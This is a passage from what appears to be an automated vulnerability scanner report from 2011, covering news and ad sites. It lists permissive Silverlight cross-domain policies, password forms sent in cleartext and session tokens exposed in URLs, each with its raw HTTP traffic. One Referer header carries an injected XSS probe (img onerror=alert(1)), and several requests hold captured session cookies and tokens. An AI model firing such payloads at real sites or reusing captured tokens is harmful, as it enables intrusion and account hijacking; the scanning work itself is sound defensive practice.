Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 09 May 2011 14:06:53 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="west.thomson.com" />

...[SNIP]...
<allow-access-from domain="thelink.thomsonreuters.com" />
...[SNIP]...
5. Silverlight cross-domain policy  previous  next
There are 9 instances of this issue:

Issue background

The Silverlight cross-domain policy controls whether Silverlight client components running on other domains can perform two-way interaction with the domain which publishes the policy. If another domain is allowed by the policy, then that domain can potentially attack users of the application. If a user is logged in to the application, and visits a domain allowed by the policy, then any malicious content running on that domain can potentially gain full access to the application within the security context of the logged in user.

Even if an allowed domain is not overtly malicious in itself, security vulnerabilities within that domain could potentially be leveraged by a third-party attacker to exploit the trust relationship and attack the application which allows access.

Issue remediation

You should review the domains which are allowed by the Silverlight cross-domain policy and determine whether it is appropriate for the application to fully trust both the intentions and security posture of those domains.

5.1. http://ad-apac.doubleclick.net/clientaccesspolicy.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad-apac.doubleclick.net
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: ad-apac.doubleclick.net

Response

HTTP/1.0 200 OK
Server: DCLK-HttpSvr
Content-Type: text/xml
Content-Length: 314
Last-Modified: Wed, 21 May 2008 20:54:04 GMT
Date: Mon, 09 May 2011 14:01:16 GMT

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from>
<domain uri="*"/>
</allow-from>
<grant-to>
<resource
...[SNIP]...
5.2. http://ad.au.doubleclick.net/clientaccesspolicy.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.au.doubleclick.net
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: ad.au.doubleclick.net

Response

HTTP/1.0 200 OK
Server: DCLK-HttpSvr
Content-Type: text/xml
Content-Length: 314
Last-Modified: Mon, 14 Apr 2008 21:50:56 GMT
Date: Mon, 09 May 2011 14:02:49 GMT

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from>
<domain uri="*"/>
</allow-from>
<grant-to>
<resource
...[SNIP]...
5.3. http://alvenda.122.2o7.net/clientaccesspolicy.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://alvenda.122.2o7.net
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: alvenda.122.2o7.net

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 14:06:52 GMT
Server: Omniture DC/2.0.0
xserver: www56
Connection: close
Content-Type: text/html

<access-policy>
   <cross-domain-access>
       <policy>
           <allow-from http-request-headers="*">
               <domain uri="*" />
           </allow-from>
           <grant-to>
               <resource path="/" include-subpaths="true" />
           </
...[SNIP]...
5.4. http://f2nthevine.112.2o7.net/clientaccesspolicy.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://f2nthevine.112.2o7.net
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: f2nthevine.112.2o7.net

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 14:06:58 GMT
Server: Omniture DC/2.0.0
xserver: www156
Connection: close
Content-Type: text/html

<access-policy>
   <cross-domain-access>
       <policy>
           <allow-from http-request-headers="*">
               <domain uri="*" />
           </allow-from>
           <grant-to>
               <resource path="/" include-subpaths="true" />
           </
...[SNIP]...
5.5. http://ipcmedia.122.2o7.net/clientaccesspolicy.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ipcmedia.122.2o7.net
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: ipcmedia.122.2o7.net

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 14:01:02 GMT
Server: Omniture DC/2.0.0
xserver: www265
Content-Length: 263
Keep-Alive: timeout=15
Connection: close
Content-Type: text/html

<access-policy>
   <cross-domain-access>
       <policy>
           <allow-from http-request-headers="*">
               <domain uri="*" />
           </allow-from>
           <grant-to>
               <resource path="/" include-subpaths="true" />
           </
...[SNIP]...
5.6. http://irishtimesgroup.112.2o7.net/clientaccesspolicy.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://irishtimesgroup.112.2o7.net
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: irishtimesgroup.112.2o7.net

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 14:04:12 GMT
Server: Omniture DC/2.0.0
xserver: www103
Connection: close
Content-Type: text/html

<access-policy>
   <cross-domain-access>
       <policy>
           <allow-from http-request-headers="*">
               <domain uri="*" />
           </allow-from>
           <grant-to>
               <resource path="/" include-subpaths="true" />
           </
...[SNIP]...
5.7. http://pixel.33across.com/clientaccesspolicy.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://pixel.33across.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: pixel.33across.com

Response

HTTP/1.1 200 OK
Accept-Ranges: bytes
ETag: W/"335-1298012417000"
Last-Modified: Fri, 18 Feb 2011 07:00:17 GMT
Content-Type: application/xml
Content-Length: 335
Date: Mon, 09 May 2011 14:05:37 GMT
Connection: close
Server: 33XG1

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from http-request-headers="SOAPAction">
<domain uri="*"/>
</allow-from>
<gr
...[SNIP]...
5.8. http://s0.2mdn.net/clientaccesspolicy.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://s0.2mdn.net
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: s0.2mdn.net

Response

HTTP/1.0 200 OK
Content-Type: text/xml
Last-Modified: Sun, 01 Feb 2009 08:00:00 GMT
Date: Sun, 08 May 2011 14:23:29 GMT
Expires: Fri, 06 May 2011 14:23:11 GMT
Vary: Accept-Encoding
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block
Age: 85055
Cache-Control: public, max-age=86400

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from>
<domain uri="*"/>
</allow-from>
<grant-to>
<resource
...[SNIP]...
5.9. http://secure-au.imrworldwide.com/clientaccesspolicy.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://secure-au.imrworldwide.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: secure-au.imrworldwide.com

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 14:06:49 GMT
Server: Apache
Cache-Control: max-age=604800
Expires: Mon, 16 May 2011 14:06:49 GMT
Last-Modified: Mon, 19 Oct 2009 01:46:36 GMT
ETag: "ff-4adbc4fc"
Accept-Ranges: bytes
Content-Length: 255
Connection: close
Content-Type: application/xml

<?xml version="1.0" encoding="utf-8" ?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from>
<domain uri="*" />
</allow-from>
<grant-to>
<resource path="/" include-subpaths="true" />
</grant
...[SNIP]...
6. Cleartext submission of password  previous  next
There are 5 instances of this issue:

Issue background

Passwords submitted over an unencrypted connection are vulnerable to capture by an attacker who is suitably positioned on the network. This includes any malicious party located on the user's own network, within their ISP, within the ISP used by the application, and within the application's hosting infrastructure. Even if switched networks are employed at some of these locations, techniques exist to circumvent this defence and monitor the traffic passing through switches.

Issue remediation

The application should use transport-level encryption (SSL or TLS) to protect all sensitive communications passing between the client and the server. Communications that should be protected include the login mechanism and related functionality, and any functions where sensitive data can be accessed or privileged actions can be performed. These areas of the application should employ their own session handling mechanism, and the session tokens used should never be transmitted over unencrypted communications. If HTTP cookies are used for transmitting session tokens, then the secure flag should be set to prevent transmission over clear-text HTTP.

6.1. http://www.clashmusic.com/news/sufjan-stevens-suffered-nervous-breakdown  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.clashmusic.com
Path:   /news/sufjan-stevens-suffered-nervous-breakdown

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /news/sufjan-stevens-suffered-nervous-breakdown HTTP/1.1
Host: www.clashmusic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 14:00:30 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: SESS5079a7bd09304b581fb1d164353615c5=47u27u5frb149p678dd9853b46; expires=Wed, 01-Jun-2011 17:33:50 GMT; path=/; domain=.clashmusic.com
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Mon, 09 May 2011 14:00:30 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 43192

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transititional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<div class="content">
<form action="/news/sufjan-stevens-suffered-nervous-breakdown?destination=login_redirect" accept-charset="UTF-8" method="post" id="user-login-form">
<div>
...[SNIP]...
</label>
<input type="password" name="pass" id="edit-pass" maxlength="60" size="15" tabindex="2" class="form-text required" />
</div>
...[SNIP]...
6.2. http://www.clashmusic.com/user/a  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.clashmusic.com
Path:   /user/a

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /user/a HTTP/1.1
Host: www.clashmusic.com
Proxy-Connection: keep-alive
Referer: http://www.clashmusic.com/user/password37226--%3E%3Cimg%20src%3da%20onerror%3dalert(1)%3E025ae694cc3
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _jsuid=5708256774256404140; __utmz=208768448.1304949660.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __qca=P0-2063829282-1304949659904; SESS5079a7bd09304b581fb1d164353615c5=4ekh37vh7uaj44s5g4323l0io1; __utma=208768448.205966012.1304949660.1304949660.1304949660.1; __utmc=208768448; __utmb=208768448.6.10.1304949660

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 14:13:42 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.17
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Mon, 09 May 2011 14:13:42 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 29873

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transititional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<!-- CONTENT AREA -->
                   
                    <form action="/user/a?destination=login_redirect" accept-charset="UTF-8" method="post" id="user-login">
<div>
...[SNIP]...
</label>
<input type="password" name="pass" id="edit-pass" size="60" tabindex="2" class="form-text required" />
<div class="description">
...[SNIP]...
6.3. http://www.floridatoday.com/odygel/lib/userauth/content/login.html  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.floridatoday.com
Path:   /odygel/lib/userauth/content/login.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /odygel/lib/userauth/content/login.html HTTP/1.1
Host: www.floridatoday.com
Proxy-Connection: keep-alive
Referer: http://www.floridatoday.com/article/20110508/NEWS01/105080319/Highly-publicized-murder-Caylee-Anthony-rivets-enrages
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: rsi_segs=D08734_70008|D08734_72078; GCIONSN=AAAAOn52dzoxfnVidDox; GCIONPN=AAAAOn5zZWdtZW50czpEMDg3MzRfNzAwMDh8RDA4NzM0XzcyMDc4; s_cc=true; s_sq=%5B%5BB%5D%5D; gban=inter%3Ddisabled%3Atrue%2Cviews%3A1%2Cexpiry%3A16H%2Cplacementid%3A1273145%2Cpreload%3Afalse%2Cid%3Ainter%2Ccontrolurl%3Ahttp%253A//gannett.gcion.com/addyn/3.0/5111.1/1273144/0/0/ADTECH%253Balias%253Dfl-brevard.flatoday.com/news/article.htm_Interstitial%253Bcookie%253Dinfo%253Bloc%253D100%253Btarget%253D_blank%253Bgrp%253D24711%253Bmisc%253D1304949586599%253Bsize%253D0%253Bnoperf%253D1%2Cexpires%3A1305007188

Response

HTTP/1.1 200 OK
Content-Type: text/html
Last-Modified: Mon, 15 Nov 2010 22:45:32 GMT
Accept-Ranges: bytes
ETag: "08e11cf1685cb1:0"
Server: Microsoft-IIS/6.0
P3P: CP="CAO CUR ADM DEVa TAIi PSAa PSDa CONi OUR OTRi IND PHY ONL UNI COM NAV DEM"
Vary: Accept-Encoding
Date: Mon, 09 May 2011 14:00:37 GMT
Connection: close
Content-Length: 2828

   <div class="ody-login-box clearfix">
       <a><div id="ody-login-close" class="ody-close"></div></a>
       <div class="ody-title">Log In<span class="ody-orsignup" id="ody-login-signup" >or&nbsp;<a>Sign Up<
...[SNIP]...
</div>
       <form id="ody-login-form" onsubmit="return false">
       <div class="ody-fields">
...[SNIP]...
<div class="ody-f-i"><input type="password" id="Password" name="Password" onkeypress="GDN.HandleKeyPress(event, GDN.UA.Events.Login.Click, 13);" style="width: 200px" />
                   </div>
...[SNIP]...
6.4. http://www.floridatoday.com/odygel/lib/userauth/content/signup.html  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.floridatoday.com
Path:   /odygel/lib/userauth/content/signup.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password fields:

Request

GET /odygel/lib/userauth/content/signup.html HTTP/1.1
Host: www.floridatoday.com
Proxy-Connection: keep-alive
Referer: http://www.floridatoday.com/article/20110508/NEWS01/105080319/Highly-publicized-murder-Caylee-Anthony-rivets-enrages
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: rsi_segs=D08734_70008|D08734_72078; GCIONSN=AAAAOn52dzoxfnVidDox; GCIONPN=AAAAOn5zZWdtZW50czpEMDg3MzRfNzAwMDh8RDA4NzM0XzcyMDc4; s_cc=true; s_sq=%5B%5BB%5D%5D; gban=inter%3Ddisabled%3Atrue%2Cviews%3A1%2Cexpiry%3A16H%2Cplacementid%3A1273145%2Cpreload%3Afalse%2Cid%3Ainter%2Ccontrolurl%3Ahttp%253A//gannett.gcion.com/addyn/3.0/5111.1/1273144/0/0/ADTECH%253Balias%253Dfl-brevard.flatoday.com/news/article.htm_Interstitial%253Bcookie%253Dinfo%253Bloc%253D100%253Btarget%253D_blank%253Bgrp%253D24711%253Bmisc%253D1304949586599%253Bsize%253D0%253Bnoperf%253D1%2Cexpires%3A1305007188

Response

HTTP/1.1 200 OK
Content-Type: text/html
Last-Modified: Wed, 17 Nov 2010 21:52:00 GMT
Accept-Ranges: bytes
ETag: "0c064a9a186cb1:0"
Server: Microsoft-IIS/6.0
P3P: CP="CAO CUR ADM DEVa TAIi PSAa PSDa CONi OUR OTRi IND PHY ONL UNI COM NAV DEM"
Vary: Accept-Encoding
Date: Mon, 09 May 2011 14:00:37 GMT
Connection: close
Content-Length: 7620

   <div class="ody-pa-box ody-su-box clearfix">
       <a><div id="ody-signup-close" class="ody-close"></div></a>
       <div class="ody-title">Sign Up<span class="ody-orlogin" id="ody-signup-login">or <a>Log i
...[SNIP]...
</div>
           <form id="UAWidget-Registration" name="UAWidget-Registration" onsubmit="return false">
           <div id="ody-signup-main" class="ody-noerrors">
...[SNIP]...
<div class="ody-f-i"><input type="password" id="Password" name="Password" onkeypress="GDN.HandleKeyPress(event, GDN.UA.Events.Registration.RegistrationClick, 13);" size="30" /></div>
...[SNIP]...
<div class="ody-f-i"><input type="password" id="ConfirmPassword" name="ConfirmPassword" onkeypress="GDN.HandleKeyPress(event, GDN.UA.Events.Registration.RegistrationClick, 13);" size="30" /></div>
...[SNIP]...
6.5. http://www.thevine.com.au/music/blogs/music-dump-_-sufjan-stevens-selling-beastie-boys-headphones-to-johnny-cash20110508.aspx  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.thevine.com.au
Path:   /music/blogs/music-dump-_-sufjan-stevens-selling-beastie-boys-headphones-to-johnny-cash20110508.aspx

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /music/blogs/music-dump-_-sufjan-stevens-selling-beastie-boys-headphones-to-johnny-cash20110508.aspx HTTP/1.1
Host: www.thevine.com.au
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 14:00:53 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=kxuwnfahnyntrb45nyzhom55; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 269864


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head id="ctl00_Head1"><t
...[SNIP]...
<!--googleoff: index-->


<form name="aspnetForm" method="post" action="../../content/detail.aspx?id=23458" onsubmit="javascript:return WebForm_OnSubmit();" id="aspnetForm">
<div>
...[SNIP]...
<td class="input"><input name="ctl00$HeaderNavigationControl$ctl00$Login1$Password" type="password" id="ctl00_HeaderNavigationControl_ctl00_Login1_Password" style="width:128px;" /></td>
...[SNIP]...
7. Session token in URL  previous  next
There are 7 instances of this issue:

Issue background

Sensitive information within URLs may be logged in various locations, including the user's browser, the web server, and any forward or reverse proxy servers between the two endpoints. URLs may also be displayed on-screen, bookmarked or emailed around by users. They may be disclosed to third parties via the Referer header when any off-site links are followed. Placing session tokens into the URL increases the risk that they will be captured by an attacker.

Issue remediation

The application should use an alternative mechanism for transmitting session tokens, such as HTTP cookies or hidden fields in forms that are submitted using the POST method.

7.1. http://api.brightcove.com/services/library  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://api.brightcove.com
Path:   /services/library

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /services/library?&token=f_N3PNF71c4w8kg-g49u4TbhGBRcIoWLOfzDvqnOllo.&callback=BCContextAware.callback&command=search_videos&video_fields=id,name,shortDescription,thumbnailURL&get_item_count=true&exact=false&sort_by=PLAYS_TRAILING_WEEK:DESC&page_number=0&page_size=10&any=stevens&any=sufjan&any=watching&any=illness&any=fantastic HTTP/1.1
Host: api.brightcove.com
Proxy-Connection: keep-alive
Referer: http://www.nme.com/news/sufjan-stevens/56527
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
X-BC-Client-IP: 173.193.214.243
X-BC-Connecting-IP: 173.193.214.243
Last-Modified: Sun, 08 May 2011 06:33:56 EDT
Cache-Control: must-revalidate,max-age=0
Content-Type: application/json;charset=UTF-8
Content-Length: 4196
Date: Mon, 09 May 2011 14:04:26 GMT
Server:

BCContextAware.callback({"items":[{"id":49582897001,"name":"The Flaming Lips - 'Watching The Planets' - Video Exclusive","shortDescription":"It's naked bodies galore as everyone bares all to run, cycl
...[SNIP]...
7.2. http://l.sharethis.com/pview  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://l.sharethis.com
Path:   /pview

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /pview?event=pview&source=share4x&publisher=4b7449a5-38e2-462a-a6cd-97326133f123&hostname=www.orlandosentinel.com&location=%2Fbusiness%2Fos-cfb-cover-casey-tv-20110509%2C0%2C6839926.story&url=http%3A%2F%2Fwww.orlandosentinel.com%2Fbusiness%2Fos-cfb-cover-casey-tv-20110509%2C0%2C6839926.story&sessionID=1304949572128.46550&fpc=23536f-12fd50e4220-5f39d80-1&ts1304949611181.0 HTTP/1.1
Host: l.sharethis.com
Proxy-Connection: keep-alive
Referer: http://www.orlandosentinel.com/business/os-cfb-cover-casey-tv-20110509,0,6839926.story
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __stid=CspT702sdV9LL0aNgCmJAg==; __switchTo5x=64; __utmz=79367510.1303478681.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __unam=8f891fa-12f7d623a1f-609dccbc-23; __utma=79367510.1475296623.1303478681.1303478681.1303478681.1

Response

HTTP/1.1 204 No Content
Server: nginx/0.7.65
Date: Mon, 09 May 2011 14:00:18 GMT
Connection: keep-alive

7.3. http://www.apture.com/js/apture.js  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://www.apture.com
Path:   /js/apture.js

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /js/apture.js?siteToken=pgKiQTB HTTP/1.1
Host: www.apture.com
Proxy-Connection: keep-alive
Referer: http://www.indianasnewscenter.com/news/local/At-Noon-Casey-Anthony-Trial-Begins-In-Florida-Plus-More-121488004.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AC=QuDxqe1K4l

Response

HTTP/1.0 200 OK
Expires: Mon, 09 May 2011 13:59:05 GMT
Last-Modified: Mon, 09 May 2011 13:59:05 GMT
Etag: "ec25c03593279e41a51488a37cd846db"
Cache-Control: max-age=0
P3p: CP="NON CURa ADMa DEVa TAIa PSAa PSDa IVAa IVDa HISa OUR LEG UNI COM NAV INT"
Content-Type: text/javascript
Content-Length: 3794
Date: Mon, 09 May 2011 13:59:05 GMT


(function(){
var B=window.apture,A=window.apture=B||{};
if(!A.isApp){
A.prefs={};A.referer="http://www.indianasnewscenter.com/news/local/At-Noon-Casey-Anthony-Trial-Begins-In-Florida-Plus-More-121488
...[SNIP]...
7.4. http://www.facebook.com/extern/login_status.php  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://www.facebook.com
Path:   /extern/login_status.php

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /extern/login_status.php?api_key=c87f9494a93b2590633af39d1b8e347f&app_id=c87f9494a93b2590633af39d1b8e347f&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df1882bbf1%26origin%3Dhttp%253A%252F%252Fwww.indianasnewscenter.com%252Ff208516ccc%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&method=auth.status&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df13f3d1bb8%26origin%3Dhttp%253A%252F%252Fwww.indianasnewscenter.com%252Ff208516ccc%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Dfa9baf21c%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df241ffe65%26origin%3Dhttp%253A%252F%252Fwww.indianasnewscenter.com%252Ff208516ccc%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Dfa9baf21c&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df3301b469%26origin%3Dhttp%253A%252F%252Fwww.indianasnewscenter.com%252Ff208516ccc%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Dfa9baf21c&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df17fe0c2e8%26origin%3Dhttp%253A%252F%252Fwww.indianasnewscenter.com%252Ff208516ccc%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Dfa9baf21c&sdk=joey&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.indianasnewscenter.com/news/local/At-Noon-Casey-Anthony-Trial-Begins-In-Florida-Plus-More-121488004.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; datr=ituyTcnawc6q7VcE0gibPCo2

Response

HTTP/1.1 302 Found
Location: http://static.ak.fbcdn.net/connect/xd_proxy.php?version=0#cb=f3301b469&origin=http%3A%2F%2Fwww.indianasnewscenter.com%2Ff208516ccc&relation=parent&transport=postmessage&frame=fa9baf21c
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.32.109.105
X-Cnection: close
Date: Mon, 09 May 2011 13:59:09 GMT
Content-Length: 0

7.5. http://www.indianasnewscenter.com/news/local/At-Noon-Casey-Anthony-Trial-Begins-In-Florida-Plus-More-121488004.html  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://www.indianasnewscenter.com
